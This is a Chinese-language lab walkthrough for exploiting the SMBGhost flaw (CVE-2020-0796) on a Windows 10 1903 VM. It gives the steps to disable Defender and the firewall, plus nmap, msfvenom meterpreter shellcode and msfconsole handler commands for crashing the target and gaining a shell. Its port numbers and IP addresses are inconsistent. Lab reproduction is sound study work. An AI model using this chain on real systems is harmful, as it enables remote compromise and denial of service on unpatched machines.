一、实验环境搭建
系统镜像:
ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|4905476096|F28FDC23DA34D55BA466BFD6E91DD311|/
建议使用迅雷下载,安装版本选win10专业版
安装完后记得一定要关闭defender,防火墙,保证win10和kali可以互ping
检测工具CVE-2020-0796-Scanner:
https://pan.baidu.com/s/1U4CHnUhgf1KN3JhCjLbGhw 提取码:b2pd
POC:
https://pan.baidu.com/s/18E5q1S33d-Fw8M6GRkZzfw 提取码:xrnw
二、怎么关闭defenderwin10杀毒 关闭defenderwin10杀毒教程
1、首先按下快捷键“ win+r ”打开运行输入“ gpedit.msc ”。
2、然后即可进入“ 本地组策略编辑器 ”。
3、依次展开“ 管理模板 —> windows组件 —> windows defender防病毒程序 ”,
双击右侧的“ 关闭defender防病毒程序 ”。
4、最后点击上方的“ 已启用 ”即可成功关闭。
三、漏洞验证
Kali主机对目标进行扫描 nmap -sS 192.168.162.2
说明已开放445端口,可利用
然后使用漏洞扫描工具CVE-2020-0796-Scanner检测漏洞
1)打开kali,放入SMBGhost_RCE_PoC-master.zip到/root下,解压
2)首先使用msfvenom生成一个python类型的shellcode
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b ‘\x00’ -i 1 -f python
3)将输出的内容复制,拷贝到exploit.py中,剪切替换原先的USER_PAYLOAD部分
4)蓝屏测试
再开一个终端,先执行 chmod +x exploit.py
再执行python3 exploit.py -ip 192.168.25.147
按回车可以触发蓝屏
此时会触发Win10蓝屏
5)接着msfconsole开启监听端口
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4488
set rhost 192.168.25.147 (Win10地址)
Run
继续使用python3 exploit.py -ip 192.168.25.147这时可以得到shell了
四、总结
如果利用失败,有以下几点需要注意
1、看下是win10不是开启了自动更新,若有把他关闭
若最近已被装了补丁,则可在卸载程序里将补丁卸载重启即可
2、看SMB有没有都开启
3、看有没有关闭防火墙
4、看win10系统版本是不是1903